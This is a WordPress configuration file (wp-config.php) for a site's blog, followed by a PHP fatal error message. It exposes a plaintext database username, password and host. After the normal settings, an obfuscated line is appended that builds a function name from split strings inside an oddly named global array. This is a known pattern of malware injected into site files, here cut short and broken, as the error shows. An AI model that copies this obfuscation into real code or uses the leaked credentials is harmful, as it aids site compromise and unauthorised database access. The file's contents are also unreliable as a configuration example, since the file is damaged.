/** WordPress's config file **/
/** http://wordpress.org/ **/
// ** MySQL settings ** //
define('DB_NAME', 'conpriego_blog'); // The name of the database
define('DB_USER', 'simdalom'); // Your MySQL username
define('DB_PASSWORD', 'j1m2p1'); // ...and password
define('DB_HOST', 'sql.conpriego.com'); // ...and the server MySQL is running on
// Change the prefix if you want to have multiple blogs in a single database.
$table_prefix = 'wp_'; // example: 'wp_' or 'b2' or 'mylogin_'
// Change this to localize WordPress. A corresponding MO file for the
// chosen language must be installed to wp-includes/languages.
// For example, install de.mo to wp-includes/languages and set WPLANG to 'de'
// to enable German language support.
define ('WPLANG', '');
/* Stop editing */
$server = DB_HOST;
$loginsql = DB_USER;
$passsql = DB_PASSWORD;
$base = DB_NAME;
define('ABSPATH', dirname(__FILE__).'/');
// Get everything else
$GLOBALS['_doxi_']=Array('e' .'rror_re' .'por' .'ti' .'ng'); ?>
Fatal error: Function name must be a string in /home/simdalom/conpriego.com/wp-config.php on line 30